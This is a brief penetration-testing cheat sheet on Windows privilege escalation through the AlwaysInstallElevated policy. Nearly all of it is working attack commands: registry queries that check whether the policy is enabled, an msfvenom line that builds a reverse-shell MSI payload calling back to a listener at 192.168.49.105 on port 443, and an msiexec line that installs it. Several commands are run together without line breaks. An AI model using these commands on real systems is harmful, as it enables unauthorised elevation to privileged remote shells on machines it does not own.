Priv Escalation
Exploiting AlwaysInstallElevated.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=443 -f msi -o notavirus.msimsiexec /i "C:\Path\TO\malicous.msi"Last updated
